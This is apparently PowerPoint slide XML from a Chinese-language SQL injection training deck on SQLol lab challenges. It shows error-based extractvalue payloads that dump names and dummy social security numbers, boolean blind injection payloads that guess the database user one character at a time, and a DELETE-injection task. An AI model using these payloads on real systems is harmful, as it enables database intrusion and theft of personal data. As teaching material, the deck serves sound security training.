              <a:t>XPATH syntax error: '~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>pte@localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>sqlol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>' </a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>显示所有字段</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>' and (</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>extractvalue</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>(1, </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>(0x7e</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>,(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>concat_ws</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>(char(32,58,32),name , </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>ssn</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t> ) from </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>ssn</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LIMIT 1 OFFSET </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>)))) and '1'='1</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>ATH syntax error: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0"/>
              <a:t>'~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>Wengdack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1"/>
              <a:t>Slobdegoob</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0"/>
              <a:t>000-00-1112'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>XPATH syntax error: '~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1"/>
              <a:t>Herp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1"/>
              <a:t>Derper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t> : 012-34-5678'  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>XPATH syntax error: '~ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Peter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>Weiner : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0"/>
              <a:t>111-22-3333</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>'  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0"/>
              <a:t>XPATH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>syntax error: '~ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Chunk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1"/>
              <a:t>MacRunfast</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0"/>
              <a:t>666-67-6776</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>'  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0"/>
              <a:t>XPATH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>syntax error: '~ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>SlapdeBack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1"/>
              <a:t>LovedeFace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0"/>
              <a:t>999-99-9999</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>'  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="528950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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入实例 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>SQLol</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>页面：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>mcir.pte.com/sqlol/challenges/challenge5.php</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>要求：找到社会安全码表，显示内容。盲注</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> - SELECT </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>访问类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>POST</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>过滤 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>不过滤</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>输出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>返回语句只有真假</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>没有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>错误</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>无</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>查询</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>语句</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1686956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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入实例 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>SQLol</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>答案</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="836712"/>
            <a:ext cx="10972800" cy="5145435"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>查找用户名</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>' or </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>ascii</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>(substring((select user()),1,1)) = 111 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>ascii</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>(substring((select user()),1,1)) = 112 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>#   -- 112 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>p</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>Got results! </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>ascii</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>(substring((select user()),2,1)) = 116 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>116</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> 是</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>Got results</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
              <a:t>!</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1253466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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入实例 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>SQLol</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>页面：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>mcir.pte.com/sqlol/challenges/challenge7.php</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>要求：找到社会安全码表，显示内容。</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>DELETE</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>DELETE</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>访问类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>POST</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>过滤 </a:t>
            </a:r>
            <a:r>
